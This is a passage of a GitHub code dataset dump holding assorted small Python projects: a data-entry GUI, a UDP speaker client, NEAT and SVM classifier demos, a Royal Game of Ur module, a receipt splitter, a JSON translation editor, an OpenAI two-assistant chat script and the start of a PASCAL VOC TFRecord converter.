Data','Job Entry List', fieldNames)\n d, j_id, j_title, j_description,c_name, cli_name = fieldVals\n row = [fieldVals]\n \n if j_id == '': \n easygui.msgbox(msg=\"Data is required\", title=\"Data Error\", ok_button=\"OK\")\n return\n\n for r in range(2,page.max_row+1):\n cell = \"{}{}\".format('B', r)\n if j_id == page[cell].value:\n easygui.msgbox(msg=\"Data already exist\", title=\"Data Error\", ok_button=\"OK\")\n return\n \n for info in row:\n page.append(info)\n \ndataEntry()\nwhile True:\n if easygui.boolbox('Do you have data to Enter??', 'Data', [\"YES\", \"NO \"]):\n dataEntry() \n \n else: break\n\nprint(\"Total Number of records:\",page.max_row-1)\nwb.save(filename=workbook_name)","repo_name":"tummalag/data_entry","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72310839442","text":"import logging\nimport socket\n\nUDP_PORT = 7777\n\n\ndef send_command(device_ip: str, command: bytes):\n logging.info(f\"Sending to {device_ip} command: {command.decode()}\")\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.sendto(command, (device_ip, 
UDP_PORT))\n","repo_name":"inverse/python-libratone","sub_path":"libratone/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38194334104","text":"from nested_dict import *\nimport numpy as np\nimport pymysql\nfrom numpy import zeros\nimport matplotlib.pyplot as plt\nfrom resolver import *\nimport random\nimport math\nimport sys\nimport os\nfrom textwrap import wrap\n\ninfile = open('arp_analyze_v6.txt.bk','r')\n# now I want to calculate Median Absolute Deviation\n\niterations = 10\n\n# base_path = '/root/PycharmProjects/printer_social/ego_analysis/'\n# for filename in os.listdir(base_path):\n# for ffile in os.listdir(base_path + filename):\n# os.unlink(base_path+filename + '/' + ffile)\n\n\n\n\n\n# create zero array\nglobal nd\nnd = nested_dict(2, list)\n\n\ndef add_to_nd(threshold,host_from,index):\n nd[threshold][host_from][index] += 1\n\ndef PD_serv_sys_analyze(threshold, type_to,host_from):\n nd.setdefault(threshold, {}).setdefault(host_from, [0]*(4))\n if type_to == \"PD\":\n add_to_nd(threshold,host_from, 0)\n elif type_to == \"service\":\n add_to_nd(threshold, host_from, 1)\n elif type_to == \"sysadmin\":\n add_to_nd(threshold, host_from, 2)\n else:\n add_to_nd(threshold, host_from, 3)\n\n\nall_lines = infile.readlines()\n\n\nfor threshold in range(0,iterations):\n #PD_to_PD = PD_to_service = PD_to_sysadmin = service_to_service = service_to_sysadmin = sysadmin_to_sysadmin = 0\n for line in all_lines:\n line = line[:-1]\n if '[' not in line or ']' not in line:\n continue\n host_from = line.split(' ')[0]\n host_to = line.split(' ')[1]\n interactions = line.split(' ')[-1].replace('[','').replace(']','').split(',')\n try:\n interactions = [int(item) for item in interactions]\n except ValueError as e :\n print(interactions)\n #del data[5:7]\n\n # method two is to use average frequency per day\n temp = []\n dsum = np.sum(interactions)\n avg_freq = dsum/len(interactions)\n if avg_freq > (threshold):\n type_from = get_type(host_from)\n type_to = get_type(host_to)\n if type_from is not None and type_to is not None :\n key_resolved = resolve_by_db(host_from)\n host_resolved = resolve_by_db(host_to)\n if key_resolved == \"''\" or key_resolved is None or key_resolved == \"\":\n key_resolved = host_from\n if host_resolved == \"''\" or host_resolved is None or host_resolved == \"\":\n host_resolved = host_to\n PD_serv_sys_analyze(threshold,type_to,host_from)\n\nprint(nd)\n\n\npd_dict = {}\nserv_dict = {}\nsys_dict = {}\nunknown_dict = {}\n\ndef calculate_percent(my_list):\n temp_list = []\n for item in my_list:\n temp_list.append(int(item/sum(my_list) * 100))\n return temp_list\n\nmy_threshold = 1\nfor ip in nd[my_threshold]:\n ttype = get_type(ip)\n host_resolved = resolve_by_db(ip)\n if host_resolved == \"''\" or host_resolved is None or host_resolved == \"\":\n host_resolved = ip\n if ttype == \"PD\":\n pd_dict[host_resolved] = calculate_percent(nd[my_threshold][ip])\n elif ttype == 'service':\n serv_dict[host_resolved] = calculate_percent(nd[my_threshold][ip])\n elif ttype == \"sysadmin\":\n sys_dict[host_resolved] = calculate_percent(nd[my_threshold][ip])\n else:\n unknown_dict[host_resolved] = calculate_percent(nd[my_threshold][ip])\n\nprint(\"PD : \" + str(pd_dict))\nprint(\"service : \" + str(serv_dict))\nprint(\"sysadmin : \" + str(sys_dict))\nprint(\"others : \" + str(unknown_dict))\n\n\nwidth = 0.15\nmy_lables = 'PD','service','sysadmin', 
'unknown'\n#\nx_ind = np.arange(len(pd_dict))\n\n# # Plot\ndisplay_threshold = 30 # this means that each plot should have at most 30 xes.\n\n\ncounter = 0\nfor type_dict in [pd_dict,serv_dict,sys_dict,unknown_dict]:\n partial_lists = []\n my_bins = int(len(type_dict) / display_threshold)\n type_dict_items = list(type_dict.items())\n while len(type_dict_items) > 0 :\n cut_index = min(len(type_dict_items),display_threshold)\n partial_lists.append(dict(type_dict_items[:cut_index]))\n del type_dict_items[:cut_index]\n\n in_counter = 1\n for part_dict in partial_lists:\n pd_values = [item[0] for item in part_dict.values()]\n serv_values = [item[1] for item in part_dict.values()]\n sys_values = [item[2] for item in part_dict.values()]\n unknown_values = [item[3] for item in part_dict.values()]\n\n x_ind = range(len(part_dict))\n width = 0.5\n plt.figure(figsize=(25, 10)) # width:20, height:3\n p1 = plt.bar(x_ind, pd_values, color='tab:red',align='edge', width=width)\n p2 = plt.bar(x_ind, serv_values,bottom=pd_values, color='tab:orange',align='edge', width=width)\n p3 = plt.bar(x_ind, sys_values,bottom=[sum(x) for x in zip(serv_values,pd_values)], color='tab:blue',align='edge', width=width)\n p4 = plt.bar(x_ind, unknown_values,bottom=[sum(x) for x in zip(sys_values,serv_values,pd_values)], color='tab:green',align='edge', width=width)\n\n my_temp = [item.replace('iit.cnr.it.','') for item in part_dict.keys()]\n my_temp = ['\\n'.join(wrap(l, 10)) for l in my_temp]\n\n plt.xticks(x_ind,my_temp ,rotation='vertical',fontsize=12)\n\n plt.legend(( p1[0], p2[0],p3[0], p4[0]), (my_lables))\n\n if counter == 0:\n out_pic = 'ego_analysis/pd_ego_figures/pd_ego_part' + str(in_counter) + \".png\"\n elif counter == 1:\n out_pic = 'ego_analysis/serv_ego_figures/serv_ego_part' + str(in_counter) + \".png\"\n elif counter == 2:\n out_pic = 'ego_analysis/sys_ego_figures/sys_ego_part' + str(in_counter) + \".png\"\n if counter == 3:\n out_pic = 'ego_analysis/unknown_ego_figures/unknown_ego_part' + str(in_counter) + \".png\"\n\n plt.savefig(out_pic)\n plt.clf()\n in_counter +=1\n\n counter += 1","repo_name":"vahidzolf/SocialIoT","sub_path":"ego_analysis_Lan.py","file_name":"ego_analysis_Lan.py","file_ext":"py","file_size_in_byte":5800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11385406738","text":"\"\"\"\n2-input XOR example -- this is most likely the simplest possible example.\n\"\"\"\n\nfrom __future__ import print_function\nfrom sklearn.externals import joblib\nimport os\nimport neat\nimport numpy\nimport visualize\n\n# 2-input XOR inputs and expected outputs.\nxor_inputs = [(0.0, 0.0), (0.0, 1.0), (1.0, 0.0), (1.0, 1.0)]\nxor_outputs = [(0.0,), (1.0,), (1.0,), (0.0,)]\n\n\ndef load_data():\n #############\n # LOAD DATA #\n #############\n\n print('... 
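loading data')\n\n    # NOTE: only the first 20 rows are used (f[0:20, ...]): columns 3:12 are the\n    # features and column 2 the label (value 2 becomes 0, anything else 1).\n    # banner above: print('... 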
loading data')\n\n # Load the dataset\n f = numpy.loadtxt(\"breastcancer.data\", delimiter=\",\", dtype=None)\n\n numpy.random.shuffle(f)\n dataset_input = f[0:20, 3:12]\n dataset_input = list(tuple(map(tuple, dataset_input)))\n\n dataset_output = f[0:20, 2:3]\n for i in dataset_output:\n i[0] = 0 if i[0] == 2 else 1\n dataset_output = list(tuple(map(tuple, dataset_output)))\n\n rval = [dataset_input, dataset_output]\n return rval\n\n\n# Load dataset\ndatasetX = load_data()[0]\ndatasetY = load_data()[1]\n\n\ndef eval_genomes(genomes, config):\n for genome_id, genome in genomes:\n genome.fitness = 30.0\n net = neat.nn.FeedForwardNetwork.create(genome, config)\n for xi, xo in zip(datasetX, datasetY):\n output = net.activate(xi)\n genome.fitness -= (output[0] - xo[0]) ** 2\n\ndef display(winner, config):\n # Display the winning genome.\n print('\\nBest genome:\\n{!s}'.format(winner))\n\n # Show output of the most fit genome against training data.\n print('\\nOutput:')\n winner_net = neat.nn.FeedForwardNetwork.create(winner, config)\n\n for xi, xo in zip(datasetX, datasetY):\n output = winner_net.activate(xi)\n print(\"input {!r}, expected output {!r}, got {!r}\".format(xi, xo, output))\n\n\ndef run(config_file):\n # Load configuration.\n config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n config_file)\n\n # Create the population, which is the top-level object for a NEAT run.\n p = neat.Population(config)\n\n # Add a stdout reporter to show progress in the terminal.\n p.add_reporter(neat.StdOutReporter(True))\n stats = neat.StatisticsReporter()\n p.add_reporter(stats)\n p.add_reporter(neat.Checkpointer(50))\n\n # Run for up to 300 generations.\n winner = p.run(eval_genomes, 1000)\n\n # Save the model the pickle file\n joblib.dump(winner, \"neat_model.pkl\")\n\n display(winner, config)\n node_names = {0: 'Breast Cancer'}\n visualize.draw_net(config, winner, True, node_names=node_names)\n visualize.plot_stats(stats, ylog=False, view=True)\n visualize.plot_species(stats, view=True)\n\n\n #\n # p = neat.Checkpointer.restore_checkpoint('neat-checkpoint-4')\n # p.run(eval_genomes, 10)\ndef cont(config_file):\n # Load configuration.\n config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n config_file)\n p = neat.Checkpointer.restore_checkpoint('neat-checkpoint-1899')\n p.add_reporter(neat.StdOutReporter(True))\n stats = neat.StatisticsReporter()\n p.add_reporter(stats)\n p.add_reporter(neat.Checkpointer(100))\n winner = p.run(eval_genomes, 500)\n\n display(winner, config)\n node_names = {0: 'Breast Cancer'}\n visualize.draw_net(config, winner, True, node_names=node_names)\n visualize.plot_stats(stats, ylog=False, view=True)\n visualize.plot_species(stats, view=True)\n\ndef load(config_file):\n # Load configuration.\n config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n config_file)\n\n # Load model\n winner = joblib.load(\"neat_model.pkl\")\n\n # Display the winning genome.\n print('\\nBest genome:\\n{!s}'.format(winner))\n\n # Show output of the most fit genome against training data.\n print('\\nOutput:')\n winner_net = neat.nn.FeedForwardNetwork.create(winner, config)\n\n error = 0\n for xi, xo in zip(datasetX, datasetY):\n output = winner_net.activate(xi)\n print(\"input {!r}, expected output {!r}, got {!r}\".format(xi, xo, output))\n error += (xo[0] - output[0]) ** 2\n\n print(\"\\nRoot mean square 
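error: %f\" % error)\n    # NOTE: despite the label, 'error' is a raw sum of squared errors; a true RMSE\n    # would be sqrt(error / len(datasetX)). Report line above: print(\"\\nRoot mean square 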
error: %f\" % error)\n\n\nif __name__ == '__main__':\n # Determine path to configuration file. This path manipulation is\n # here so that the script will run successfully regardless of the\n # current working directory.\n local_dir = os.path.dirname(__file__)\n config_path = os.path.join(local_dir, 'config-feedforward')\n load(config_path)\n # cont(config_path)\n","repo_name":"batectin/FYP_EDANN","sub_path":"xor_neat.py","file_name":"xor_neat.py","file_ext":"py","file_size_in_byte":4659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3917512202","text":"\"\"\"\r\nFile: board_square.py\r\nAuthor: Alex Strong\r\nDate: 11/15/2020\r\nSection: 44\r\nE-mail: astrong3@umbc.edu\r\nDescription: This code stores the classes which assist to run the game such as the\r\n UrPiece class and the BoardSquare class which contain methods and attributes\r\n to keep track of components, and help the game to run smoothly\r\n\"\"\"\r\nclass UrPiece:\r\n def __init__(self, color, symbol, rosettes, entrance, exit):\r\n self.color = color\r\n self.position = None\r\n self.complete = False\r\n self.symbol = symbol\r\n self.rosettes = rosettes\r\n self.entrance = entrance\r\n self.exit = exit\r\n\r\n def can_move(self, num_moves):\r\n \"\"\"\r\n Runs basically the same code as move_piece function, but instead of changing piece and board values\r\n it instead checks to see if the piece is able to remove and returns either true or false\r\n :param num_moves:\r\n :return:\r\n \"\"\"\r\n temp_num_moves = num_moves\r\n this_piece = self\r\n most_recent_square = None\r\n original_position = self.position\r\n\r\n # same code comments as move_piece\r\n while temp_num_moves != 0:\r\n if not this_piece.position and not this_piece.complete:\r\n this_piece.position = this_piece.entrance\r\n most_recent_square = this_piece.position\r\n elif this_piece.position and not this_piece.complete:\r\n if this_piece.color == 'White':\r\n if this_piece.position.exit == 'White':\r\n if temp_num_moves == 1:\r\n # if the piece is on an exit position and can move only 1 spot forward then it can move\r\n return True\r\n else:\r\n # if the piece reaches exit position and has more than 1 move then it cannot exit\r\n return False\r\n else:\r\n this_piece.position = this_piece.position.next_white\r\n most_recent_square = this_piece.position\r\n else:\r\n if this_piece.color == 'Black':\r\n if this_piece.position.exit == 'Black':\r\n if temp_num_moves == 1:\r\n # same as with white color\r\n return True\r\n else:\r\n return False\r\n else:\r\n this_piece.position = this_piece.position.next_black\r\n most_recent_square = this_piece.position\r\n temp_num_moves -= 1\r\n this_piece.position = original_position\r\n\r\n if most_recent_square:\r\n if most_recent_square.piece:\r\n # if color is the same then you cannot move onto that piece\r\n if most_recent_square.piece.color == self.color:\r\n return False\r\n # if color is different but the piece is on a rosette then you cannot bump them off\r\n elif most_recent_square.piece.color != self.color and most_recent_square.rosette:\r\n return False\r\n # if color is different but piece not on rosette then you can move there and bump them off\r\n elif most_recent_square.piece.color != self.color and not most_recent_square.rosette:\r\n return True\r\n # if square piece is empty then you can move onto it\r\n else:\r\n return True\r\n\r\n\r\nclass BoardSquare:\r\n def __init__(self, x, y, entrance=False, _exit=False, rosette=False, forbidden=False):\r\n 
self.piece = None\r\n self.position = (x, y)\r\n self.next_white = None\r\n self.next_black = None\r\n self.exit = _exit\r\n self.entrance = entrance\r\n self.rosette = rosette\r\n self.forbidden = forbidden\r\n\r\n def load_from_json(self, json_string):\r\n import json\r\n loaded_position = json.loads(json_string)\r\n self.piece = None\r\n self.position = loaded_position['position']\r\n self.next_white = loaded_position['next_white']\r\n self.next_black = loaded_position['next_black']\r\n self.exit = loaded_position['exit']\r\n self.entrance = loaded_position['entrance']\r\n self.rosette = loaded_position['rosette']\r\n self.forbidden = loaded_position['forbidden']\r\n\r\n def jsonify(self):\r\n next_white = self.next_white.position if self.next_white else None\r\n next_black = self.next_black.position if self.next_black else None\r\n return {'position': self.position, 'next_white': next_white, 'next_black': next_black, 'exit': self.exit, 'entrance': self.entrance, 'rosette': self.rosette, 'forbidden': self.forbidden}\r\n","repo_name":"alexestrong/Python-RoyalGameOfUr-Emulator","sub_path":"board_square.py","file_name":"board_square.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14735121240","text":"from http.server import HTTPServer, SimpleHTTPRequestHandler\nimport ssl\n\n# openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365\n# https://localhost:4433\n\nhttpd = HTTPServer(('localhost', 4433), SimpleHTTPRequestHandler)\n\nhttpd.socket = ssl.wrap_socket(\n httpd.socket,\n keyfile = \"key.pem\", \n certfile = 'cert.pem',\n server_side = True)\n\nhttpd.serve_forever()\n","repo_name":"andreypudov/sharelink-preview","sub_path":"artifacts/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27564352636","text":"from backend.ReceiptTracker import ReceiptTracker\nfrom backend.Item import Item\n\nclass model():\n receipts = None\n receipt_change_listeners = None\n person_change_listeners = None\n\n def __init__(self):\n self.receipts = list()\n self.receipt_change_listeners = set()\n self.person_change_listeners = set()\n\n def get_names(self):\n names = list()\n for receipt in self.receipts:\n names.append(receipt.get_name())\n \n return names\n\n def add_receipt_line(self, people, name, cost):\n shared_item = Item(name, cost)\n print(cost)\n try:\n float(cost)\n except ValueError as error:\n raise TypeError\n\n for receipt in self.receipts:\n for person in people:\n if person == receipt.get_name():\n receipt.add_receipt_line(shared_item, 1/(len(people)+1))\n \n self.update_receipt_listeners()\n \n def update_receipt_listeners(self):\n for receipt_listener in self.receipt_change_listeners:\n receipt_listener.receipt_update(self)\n \n def add_receipt_listeners(self, receipt_listener):\n self.receipt_change_listeners.add(receipt_listener)\n\n #returns whole receipt as string\n def receipt_to_string(self, receipt_name):\n return_string = \"\"\n\n for receipt in self.receipts:\n #print(receipt_name, receipt.get_name())\n if receipt_name == receipt.get_name():\n return_string = receipt.to_string()\n \n return return_string\n\n #returns set of receipt lines as strings\n def receipt_to_string_set(self, receipt_name):\n receipt_lines_strings = None\n\n for receipt in self.receipts:\n if receipt_name == receipt.get_name():\n receipt_lines_strings 
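= receipt.to_string_set()\n                # NOTE: stays None when no receipt matches receipt_name; callers must\n                # handle that case. Assignment above: receipt_lines_strings 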
= receipt.to_string_set()\n \n return receipt_lines_strings\n\n def add_person(self, name):\n print(name)\n if name != \"\" and name not in self.get_names():\n self.receipts.append(ReceiptTracker(name))\n for listener in self.person_change_listeners:\n listener.person_update(self)\n \n def add_person_change_listeners(self, listener):\n self.person_change_listeners.add(listener)\n \n # def remove_person(self, name):\n # for receipt in self.receipts:\n # if receipt.name == name:\n # receipts.remove(receipt)\n\n def get_total(self, name):\n total = 0\n for receipt in self.receipts:\n if name == receipt.get_name():\n total = receipt.get_owed()\n return total","repo_name":"s3716853/Receipt_Tracker","sub_path":"receipt_manager/backend/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"14563230241","text":"import json\r\nimport tkinter as tk\r\n\r\ndef compare_json_files(model_file, translation_file):\r\n with open(model_file, 'r', encoding='utf-8') as file1, open(translation_file, 'r+', encoding='utf-8') as file2:\r\n model_data = json.load(file1)\r\n translation_data = json.load(file2)\r\n \r\n missing_keys = [key for key in model_data if key not in translation_data]\r\n extra_keys = [key for key in translation_data if key not in model_data]\r\n \r\n for key in extra_keys:\r\n del translation_data[key]\r\n \r\n def submit():\r\n nonlocal current_key_index\r\n key = missing_keys[current_key_index]\r\n value = entry.get(\"1.0\", tk.END).strip()\r\n \r\n if value:\r\n translation_data[key] = value\r\n \r\n if current_key_index < len(missing_keys) - 1:\r\n entry.insert(tk.END, ',\\n')\r\n \r\n file2.seek(0)\r\n json.dump(translation_data, file2, indent=4, ensure_ascii=False)\r\n file2.truncate()\r\n \r\n current_key_index += 1\r\n if current_key_index < len(missing_keys):\r\n show_next_key()\r\n else:\r\n root.quit()\r\n\r\n def show_next_key():\r\n key = missing_keys[current_key_index]\r\n entry.delete(\"1.0\", tk.END)\r\n entry.insert(tk.END, \"\")\r\n label.config(text=f\"Missing Translation:\\n\\nKey: {key}\\nValue: {model_data[key]}\")\r\n\r\n root = tk.Tk()\r\n root.title(\"Translation Editor\")\r\n root.iconbitmap('icon.ico')\r\n root['bg']='#2f2f2f'\r\n \r\n label = tk.Label(root, text=\"\")\r\n label.pack()\r\n \r\n entry = tk.Text(root, height=10, width=50)\r\n entry.pack()\r\n \r\n submit_button = tk.Button(root, text=\"Submit\", command=submit)\r\n submit_button.pack()\r\n \r\n current_key_index = 0\r\n show_next_key()\r\n \r\n root.protocol(\"WM_DELETE_WINDOW\", root.quit)\r\n root.mainloop()\r\n root.destroy()\r\n \r\n print(\"Translation updates have been saved.\")\r\n \r\n file2.close()\r\n\r\n# Place the file you want to translate in the input folder and change the \"model_file_path\" value below to the path of your input file.\r\nmodel_file_path = 'input/'\r\n\r\n# Place the output file in the output folder and change the \"translation_file_path\" value below to the path of your output file.\r\ntranslation_file_path = 'output/'\r\n\r\n\r\ncompare_json_files(model_file_path, translation_file_path)\r\n","repo_name":"Grand-Roi-Pasteque/Json-Translator","sub_path":"json_translator/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37871590749","text":"def bubbleSort(newlist=[]):\n for i in 
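range(0,len(newlist)-1):\n        # NOTE: the inner bound could shrink to len(newlist)-1-i, because the largest\n        # i values are already in place after i passes. Outer loop header: for i in 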
range(0,len(newlist)-1):\n for j in range(0,len(newlist)-1): \n if newlist[j] > newlist[j+1]:\n newlist[j], newlist[j+1] = newlist[j+1], newlist[j]\n return newlist\n\nbubbleSort([5,6,7,11,34,4,56,87,1,2343,4,657686878,3,3,5,7,8,9,0,0,6,2,1])\n\n\n\ndef selectionSort(newlist = []):\n min = 0\n count = 0\n for i in range(0,len(newlist)-1):\n for j in range(i,len(newlist)-1):\n if min > newlist[j]: \n min = newlist[j]\n count = j\n newlist[count], newlist[i] = newlist[i],newlist[count]\n return newlist\n \nselectionSort([5,6,7,11,34,4,56,87,1,2343,4,657686878,3,3,5,7,8,9,0,0,6,2,1])\n\n ","repo_name":"Nassertakkesh/Python","sub_path":"extra_practice/bubbleSort.py","file_name":"bubbleSort.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33010098923","text":"import random\r\nfrom utils.coin_env import coin_game\r\n\r\n\r\ndef rule_based_AI(env):\r\n if env.state%3 != 0:\r\n move = env.state%3\r\n else:\r\n move = env.sample()\r\n return move\r\n\r\n\r\ndef random_player(env):\r\n move = env.sample()\r\n return move\r\n\r\n\r\n# Define the one_coin_game() function\r\ndef one_coin_game(player1, player2):\r\n env = coin_game()\r\n env.reset() \r\n while True: \r\n action = player1(env) \r\n new_state, reward, done, info = env.step(action)\r\n if done:\r\n break\r\n action = player2(env) \r\n new_state, reward, done, info = env.step(action)\r\n if done:\r\n break \r\n return reward ","repo_name":"markhliu/AlphaGoSimplified","sub_path":"utils/ch01util.py","file_name":"ch01util.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22436585862","text":"import time\nimport threading\nimport os\nimport openai\nfrom openai import OpenAI\n\nclient = OpenAI()\nclient.api_key = os.environ.get('OPENAI_API_KEY')\n\ndef get_last_assistant_message(thread_id):\n messages_response = client.beta.threads.messages.list(thread_id=thread_id)\n messages = messages_response.data\n \n # Iterate through messages in reverse chronological order to find the last assistant message\n for message in messages:\n if message.role == 'assistant':\n # Get the content of the last assistant message\n assistant_message_content = \" \".join(\n content.text.value for content in message.content if hasattr(content, 'text')\n )\n return assistant_message_content.strip()\n \n return \"\" # Return an empty string if there is no assistant message\n\ndef converse(assistant_1_params, assistant_2_params, topic, message_count):\n print(\"TOPIC: \"+topic+\"\\n\")\n # Initialize Assistants\n assistant_1 = client.beta.assistants.create(**assistant_1_params)\n assistant_2 = client.beta.assistants.create(**assistant_2_params)\n\n # Create Threads\n thread_1 = client.beta.threads.create()\n thread_2 = client.beta.threads.create()\n\n # Function for the conversation between two assistants\n def assistant_conversation(start_message, assistant_a, thread_a, assistant_b, thread_b, msg_limit):\n message_content = start_message\n last_user_message_id = None # Initialize with no last user message\n \n for i in range(msg_limit):\n # Determine which assistant is speaking for color coding\n if assistant_a == assistant_1:\n assistant_color = '\\033[94m\\033[1m' \n assistant_name = assistant_1_params.get('name')\n else:\n assistant_color = '\\033[92m\\033[1m'\n assistant_name = assistant_2_params.get('name')\n \n # Bold and color the assistant's name and print the 
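turn number.\n            # Colors: '\\033[94m' blue (assistant 1), '\\033[92m' green (assistant 2),\n            # '\\033[1m' bold, '\\033[0m' reset. Original comment: ... print the 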
turn\n print(f\"{assistant_color}{assistant_name} speaking...\\033[0m (Turn {i + 1})\")\n \n # Send the message and wait for a response\n user_message = client.beta.threads.messages.create(\n thread_id=thread_a.id,\n role=\"user\",\n content=message_content\n )\n \n # Run the assistant and wait until it's done\n run = client.beta.threads.runs.create(\n thread_id=thread_a.id,\n assistant_id=assistant_a.id\n )\n while True:\n run_status = client.beta.threads.runs.retrieve(\n thread_id=thread_a.id,\n run_id=run.id\n )\n if run_status.status == 'completed':\n break\n time.sleep(1) # sleep to avoid hitting the API too frequently\n \n # Get all messages from the assistant since the last 'user' message\n message_content = get_last_assistant_message(thread_a.id)\n \n # Print out each of the assistant's messages\n print(message_content+\"\\n\")\n \n # Swap the assistants and threads for the next turn in the conversation\n assistant_a, assistant_b = assistant_b, assistant_a\n thread_a, thread_b = thread_b, thread_a\n\n\n # Start the conversation\n start_message = f\"Respond with a starting line to discuss {topic}?\"\n conversation_thread = threading.Thread(\n target=assistant_conversation,\n args=(start_message, assistant_1, thread_1, assistant_2, thread_2, message_count)\n )\n conversation_thread.start()\n conversation_thread.join()\n\n# Define the parameters for the two assistants (example parameters provided)\nassistant_1_params = {\n 'name': \"Pirate\",\n 'instructions': \"You are a mean pirate.\",\n 'tools': [{\"type\": \"code_interpreter\"}],\n 'model': \"gpt-3.5-turbo-1106\"\n}\n\nassistant_2_params = {\n 'name': \"Mermaid\",\n 'instructions': \"You are a bubbly mermaid who speaks like a Valley Girl.\",\n 'tools': [{\"type\": \"code_interpreter\"}],\n 'model': \"gpt-3.5-turbo-1106\"\n}\n\n# Example usage:\nconverse(assistant_1_params, assistant_2_params, \"global warming\", 5)\n","repo_name":"yoheinakajima/GPTvsGPT","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":136,"dataset":"github-code","pt":"3"} +{"seq_id":"2203576012","text":"from sklearn.svm import LinearSVC\r\nfrom sklearn.metrics import accuracy_score\r\n\r\n\r\n# classification 0 or 1\r\n\r\n# 0 = dog // 1 = pig\r\n\r\n# guess by features \r\n\r\n#dog or pig\r\n#long hair \r\n#short leg \r\n#song \"Auau\"\r\n\r\ndef main():\r\n #my code\r\n pig1 = [0,1,0]\r\n pig2 = [0,1,1]\r\n pig3 = [1,1,0]\r\n\r\n dog1 = [0,1,1]\r\n dog2 = [1,0,1]\r\n dog3 = [0,1,1]\r\n\r\n train_x = [pig1,pig2,pig3,dog1,dog2,dog3]\r\n train_y = [1,1,1,0,0,0]\r\n\r\n # f(x) = y \r\n model = LinearSVC()\r\n model.fit(train_x, train_y)\r\n\r\n mistery_animal1 = [1,1,1]\r\n mistery_animal2 = [1,1,0]\r\n mistery_animal3 = [0,1,1]\r\n\r\n test_x = [mistery_animal1 , mistery_animal2 , mistery_animal3]\r\n test_y = [0 , 1 ,1]\r\n \r\n p = model.predict(test_x)\r\n\r\n #accuracy \r\n hit_rate = accuracy_score(test_y, p)\r\n\r\n print(hit_rate)\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"guicosta01/ML_Classification","sub_path":"classification_dog_pig.py","file_name":"classification_dog_pig.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29366187352","text":"r\"\"\"Convert raw PASCAL dataset to TFRecord for object_detection.\n\nExample usage:\n python object_detection/dataset_tools/create_pascal_tf_record_my.py \\\n 
--data_dir=/home/user/VOCdevkit \\\n --year=VOC2012 \\\n --output_path=/home/user/pascal.record\n\"\"\"\n# from __future__ import absolute_import\n# from __future__ import division\n# from __future__ import print_function\n\nimport hashlib\nimport io\nimport logging\nimport os\n\nfrom lxml import etree\nimport PIL.Image\nimport tensorflow as tf\n\n# absl 库全称是 Abseil Python Common Libraries。它原本是个C++库,后来被迁移到了Python上。\nfrom absl import app, flags, logging\n\nfrom pathlib import Path\nimport cv2\n\n# import tensorflow.compat.v1 as tf\n# FLAGS = tf.app.flags.FLAGS\n\n# from dataset_tools.utils import utils.dataset_util\n# from object_detection.utils import label_map_util\n\n# from utils.dataset_util import *\n# from utils.label_map_util import *\nimport utils.dataset_util as dataset_util\nimport utils.label_map_util as label_map_util\n\n# flags = tf.app.flags\n# flags = tf.compat.v1.flags\n\nflags.DEFINE_string('data_dir', '', 'Root directory to raw PASCAL VOC dataset.')\nflags.DEFINE_string('name', '', 'Desired challenge name.')\n# flags.DEFINE_string('set', 'train', 'Convert training set, validation set or '\n# 'merged set.')\nflags.DEFINE_string('annotations_dir', 'Annotations',\n '(Relative) path to annotations directory.')\n\nflags.DEFINE_string('label_map_path', 'label_map.pbtxt',\n 'Path to label map proto')\nflags.DEFINE_boolean('ignore_difficult_instances', False, 'Whether to ignore '\n 'difficult instances')\n# flags.DEFINE_string('action', 'tfrecord', 'Action in [tfrecord, imageset]')\n# flags.DEFINE_string('imageset', 'image', 'image set name')\nflags.DEFINE_string('output_path', '', 'Path to output TFRecord')\n\nFLAGS = flags.FLAGS\n\nSETS = ['train', 'val', 'trainval', 'test']\n\n\n# YEARS = ['VOC2007', 'VOC2012', 'merged']\n\ndef get_all_annotations(annotations_dir):\n all_annotations = []\n for root, dirs, files in os.walk(annotations_dir):\n for file in files:\n if os.path.splitext(file)[1] == '.xml':\n all_annotations.append(os.path.splitext(file)[0])\n return all_annotations\n\n\ndef write_annotations(annotations, data_folder, image_set):\n imageset_main_dir = os.path.join(data_folder, 'ImageSets', 'Main')\n if not os.path.exists(imageset_main_dir):\n os.makedirs(imageset_main_dir)\n imageset_file = imageset_main_dir + os.sep + image_set + '.txt'\n with open(imageset_file, 'w') as wf:\n for annotation in annotations:\n wf.write(annotation 